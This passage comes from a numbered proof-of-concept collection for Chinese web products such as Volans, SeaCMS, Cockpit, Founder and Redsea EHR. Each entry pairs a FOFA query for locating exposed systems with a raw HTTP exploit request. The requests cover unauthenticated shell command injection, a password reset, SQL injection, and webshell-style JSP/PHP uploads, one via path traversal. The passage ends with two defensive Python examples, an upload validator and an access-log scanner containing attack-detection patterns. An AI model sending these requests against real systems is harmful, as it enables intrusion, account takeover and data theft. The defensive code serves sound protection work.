Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 (Volans) Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"

The name field of the JSON body is concatenated into a shell command without authentication; the output of uname -a is returned in the response:

POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"

resetPasswordBySuper accepts an unauthenticated request and sets the password of the account named in xgh:

POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"

UNION-based injection in the goonumStr parameter; the response to the request below contains 12321 (111*111) when the target is vulnerable:

GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640

The sid parameter of the LuCI aliyundrive-webdav query action is passed to a shell. The value below URL-decodes to `ls />/www/aaa.txt` (a backtick-quoted command followed by a space), so the directory listing becomes readable at /aaa.txt. An authenticated LuCI session (sysauth cookie) is required:

GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager/upload file upload
FOFA:title="Authenticate Please!"

1. Request the login page to obtain the CSRF token (returned in the body under the key "csfr"), then exchange it for a session cookie, then upload the file and request it:

GET /auth/login?to=/ HTTP/1.1

Response: 200, body contains csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT from the previous step to obtain a cookie (the POC relies on the default admin/admin credentials):

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with that session cookie; the extension is not restricted, so a PHP file is stored and served:

POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

The uploaded file is then reachable at:
/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"

Time-based blind injection in the id parameter of the dmku player endpoint; a response delayed by about 5 seconds confirms it:

GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) All-Media News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"

The TableName parameter is concatenated into the query; the stacked WAITFOR DELAY (MSSQL) delays the response by about 5 seconds:

POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"

Obtain the __VIEWSTATE and __EVENTVALIDATION values from the form page:

GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Substitute the __VIEWSTATE and __EVENTVALIDATION values obtained above into the upload request (the button field must carry its literal value, 上传图片):

POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is then reachable at:
/_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"

The upload method of PtFjk.mob checks neither authentication nor the file extension; the declared Content-Type of image/jpeg is not enforced against the .jsp filename:

POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

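The upload entries above (192, 194, 199, 202 and 203) all fail in the same way: the server trusts the client-supplied filename or Content-Type and lets a traversal sequence or an executable extension through. The following is an added example of the server-side check that closes all of them; it is not any vendor's code. The function names, the ALLOWED_EXT allowlist and the EXECUTABLE_EXT list are assumptions chosen for this example; the test filenames are copied from the payloads above.

```python
"""Added example (not the vendors' code): server-side filename validation
for an upload endpoint.  The filename is reduced to its last path component,
double extensions are rejected, the extension must be on an allowlist, the
declared Content-Type is ignored entirely, and the final path is verified to
stay inside the upload directory."""
import os
from pathlib import PurePosixPath
from typing import Optional

# Assumed allowlist for this example; a real deployment derives it from what
# the feature needs (mail attachments, avatars, ...), never from the client.
ALLOWED_EXT = {".txt", ".jpg", ".jpeg", ".png", ".pdf"}
# Extensions a web server or servlet container would execute: the ones used in
# the payloads above (.jsp, .php, .ashx) plus the usual ASP/PHP variants.
EXECUTABLE_EXT = {".jsp", ".jspx", ".php", ".phtml", ".ashx", ".asp", ".aspx"}


def check_upload_name(client_filename: str) -> Optional[str]:
    """Return None if the client-supplied filename is acceptable, otherwise the
    reason for rejecting it."""
    if "\x00" in client_filename:
        return "null byte in filename"
    # Treat '\\' as a separator too: a Windows-hosted .NET app (entries 192,
    # 202) honours it just as the FE payload's '../' is honoured on JBoss.
    name = PurePosixPath(client_filename.replace("\\", "/")).name
    if name != client_filename or name in ("", ".", ".."):
        return f"path components or empty name in {client_filename!r}"
    suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
    if not suffixes:
        # A bare '.ashx' (entry 192's ?name=.ashx) is a dotfile with no suffix.
        return "no extension"
    if any(s in EXECUTABLE_EXT for s in suffixes):
        # Catches 11.jsp, tttt.php and double extensions such as shell.jsp.txt.
        return f"executable extension in {name!r}"
    if suffixes[-1] not in ALLOWED_EXT:
        return f"extension {suffixes[-1]} not in allowlist"
    return None


def safe_upload_path(upload_dir: str, client_filename: str) -> str:
    """Resolve the storage path for an accepted filename, or raise ValueError.
    The containment check is redundant once check_upload_name has passed, but
    it is the check that would have stopped '../../jboss/web/fe.war/hello.jsp'
    even if the name check were bypassed."""
    reason = check_upload_name(client_filename)
    if reason:
        raise ValueError(reason)
    root = os.path.abspath(upload_dir)
    dest = os.path.abspath(os.path.join(root, client_filename))
    if os.path.commonpath([root, dest]) != root:
        raise ValueError(f"{client_filename!r} escapes {root}")
    return dest


if __name__ == "__main__":
    # Filenames taken from the payloads in entries 192, 194, 199, 202 and 203.
    for fn in ("../../../../../jboss/web/fe.war/hello.jsp", "11.jsp", "tttt.php",
               ".ashx", "shell.jsp.txt", "1123.txt"):
        print(f"{fn!r}: {check_upload_name(fn) or 'accepted'}")
```

Rejecting on any executable suffix anywhere in the name, not only the last one, matters because some server configurations dispatch on the first recognised extension; and keying the decision on the filename rather than the multipart Content-Type is what defeats entry 203's image/jpeg label on a .jsp.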
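For the defensive review the introduction asks for, the fastest first pass is to search existing web-server access logs for the request lines above. The following is an added example of that check, not part of the original article: it parses combined-format log lines, normalises the path so that the bypass spellings used above (/js/../NavigationAjax, Quotegask_editAction.entweb;.js) still match, and tags each hit with the entry number and with any payload fragment visible in the query string. The endpoint paths are copied from entries 190 to 203; the log lines in SAMPLE_LOG are constructed for the example. Note the caveat built into ENDPOINTS: for entries whose payload travels in a POST body, the access log shows only the path, so a hit there is a lead to confirm in the application's own logs, not proof of exploitation.

```python
"""Added example (not from the original article): scan access logs for the
endpoints and payload fragments of entries 190-203.  SAMPLE_LOG is constructed
for this example; the endpoint paths are taken from the request lines above."""
import posixpath
import re
from urllib.parse import unquote, unquote_plus

# Apache/nginx combined format: ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) \S+'
)

# Endpoint paths from entries 190-203.  For entries whose payload is in the POST
# body (190-196, 199, 201-203) the access log records only the path, so a path
# hit is a lead to confirm elsewhere, not proof of exploitation.
ENDPOINTS = {
    "/index.php/admin/Userinfo/poihuoqu": "190 poihuoqu file read",
    "/CDGServer3/NavigationAjax": "191 NavigationAjax SQLi",
    "/JoinfApp/EMail/UploadEmailAttr": "192 UploadEmailAttr upload",
    "/master/ajaxActions/setSystemTimeAction.php": "193 setSystemTimeAction RCE",
    "/servlet/uploadAttachmentServlet": "194 uploadAttachmentServlet upload",
    "/send_order.cgi": "195 send_order.cgi RCE",
    "/cas/userCtl/resetPasswordBySuper": "196 resetPasswordBySuper",
    "/entsoft/Quotegask_editAction.entweb": "197 Quotegask_editAction SQLi",
    "/admin/services/aliyundrive-webdav/query": "198 aliyundrive-webdav RCE",
    "/assetsmanager/upload": "199 assetsmanager upload",
    "/js/player/dmplayer/dmku": "200 dmku SQLi",
    "/newsedit/newsplan/task/binary.do": "201 binary.do SQLi",
    "/User/AccountEdit.aspx": "202 AccountEdit upload",
    "/RedseaPlatform/PtFjk.mob": "203 PtFjk upload",
}

# Payload fragments from the query strings and bodies above, matched against the
# URL-decoded request target (path plus query).
PAYLOADS = [
    (re.compile(r"file://", re.I), "file:// wrapper"),
    (re.compile(r"waitfor\s+delay|\bsleep\s*\(", re.I), "time-based SQLi"),
    (re.compile(r"union\s+(?:all\s+)?select", re.I), "UNION SQLi"),
    (re.compile(r"`|\$\("), "shell metacharacter"),
    (re.compile(r"\.\./"), "path traversal"),
    (re.compile(r"os\.system\s*\("), "os.system call"),
]


def normalize_path(path: str) -> str:
    """Decode the path, drop ';' path parameters from every segment and collapse
    '..' segments, so '/CDGServer3/js/../NavigationAjax' and
    '/entsoft/Quotegask_editAction.entweb;.js' map onto the ENDPOINTS keys."""
    segments = [seg.split(";", 1)[0] for seg in unquote(path).split("/")]
    return posixpath.normpath("/".join(segments))


def classify(target: str) -> list:
    """Return the labels that a request target (path + query string) matches."""
    path, _, query = target.partition("?")
    norm = normalize_path(path)
    tags = [label for ep, label in ENDPOINTS.items() if ep in norm]
    # The raw decoded path is kept for the traversal check: the '..' is the
    # evidence, and normalisation would erase it.
    decoded = unquote(path) + "?" + unquote_plus(query)
    tags += [label for pattern, label in PAYLOADS if pattern.search(decoded)]
    return tags


def scan(lines) -> list:
    """Return one dict per log line whose request target matches a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        tags = classify(m["target"])
        if tags:
            hits.append({"ip": m["ip"], "method": m["method"],
                         "target": m["target"], "status": m["status"],
                         "tags": tags})
    return hits


# Constructed sample log, modelled on the request lines of entries 190-200.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jun/2024:08:01:02 +0800] "POST /index.php/admin/Userinfo/poihuoqu HTTP/2.0" 200 1523
10.0.0.5 - - [10/Jun/2024:08:02:10 +0800] "POST /CDGServer3/js/../NavigationAjax HTTP/1.1" 200 88
10.0.0.7 - - [10/Jun/2024:08:03:30 +0800] "GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1" 200 40
10.0.0.7 - - [10/Jun/2024:08:04:00 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1" 200 12
10.0.0.9 - - [10/Jun/2024:08:05:00 +0800] "GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200 0
192.168.1.20 - - [10/Jun/2024:08:06:00 +0800] "GET /index.php/admin/login HTTP/1.1" 200 3310
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit["ip"], hit["method"], hit["target"], "->", ", ".join(hit["tags"]))
```

Run it against a real log with scan(open("access.log")). A 200 status on an upload or command-execution endpoint deserves a follow-up on the host itself (new files under the web root or the paths named in entries 193, 199 and 202); a 404 on the same path is still worth a look, since it shows the target was being probed.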